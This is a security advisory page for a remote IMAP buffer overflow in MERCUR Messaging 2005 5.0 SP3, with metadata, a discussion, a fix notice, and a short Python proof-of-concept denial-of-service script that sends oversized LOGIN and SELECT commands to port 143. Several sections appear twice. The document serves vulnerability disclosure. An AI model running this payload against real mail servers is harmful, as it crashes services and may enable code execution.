MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
BID:17138
Info
MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 17138 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 17 2006 12:00AM |
| Updated: | Jan 16 2007 06:00PM |
| Credit: | Discovered by Tim Taylor. |
| Vulnerable: |
Atrium Software MERCUR Messaging 2005 Standard Edition 5.0 SP3 Atrium Software MERCUR Messaging 2005 Lite Edition 5.0 SP3 Atrium Software MERCUR Messaging 2005 Enterprise Edition 5.0 SP3 |
| Not Vulnerable: | |
Discussion
MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
MERCUR Messaging 2005 is prone to a remote buffer-overflow vulnerability.
The vulnerability presents itself when the server handles specially crafted IMAP commands.
This may result in memory corruption leading to a denial-of-service condition or arbitrary code execution.
MERCUR Messaging 2005 version 5.0 SP3 is reported to be vulnerable. Other versions may be affected as well.
MERCUR Messaging 2005 is prone to a remote buffer-overflow vulnerability.
The vulnerability presents itself when the server handles specially crafted IMAP commands.
This may result in memory corruption leading to a denial-of-service condition or arbitrary code execution.
MERCUR Messaging 2005 version 5.0 SP3 is reported to be vulnerable. Other versions may be affected as well.
Exploit / POC
MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
The following proof of concept is available:
-- DoS Exploit --
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre authentifcation buffer overflow in imap command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login "\x41" * 275 + "\r\n")
# buffer overflow in imap commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login test test\r\n")
print s.recv(256)
s.send("a002 select " + "\x41" * 239 + "\r\n").
Exploit code as part of the Metasploit Framework project has been released.
The following proof of concept is available:
-- DoS Exploit --
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre authentifcation buffer overflow in imap command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login "\x41" * 275 + "\r\n")
# buffer overflow in imap commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login test test\r\n")
print s.recv(256)
s.send("a002 select " + "\x41" * 239 + "\r\n").
Exploit code as part of the Metasploit Framework project has been released.
Solution / Fix
MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
Solution:
The vendor has released fixes to address this issue.
Solution:
The vendor has released fixes to address this issue.
References
MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability
References:
References:
- MERCUR Messaging 2005 (Atrium Software)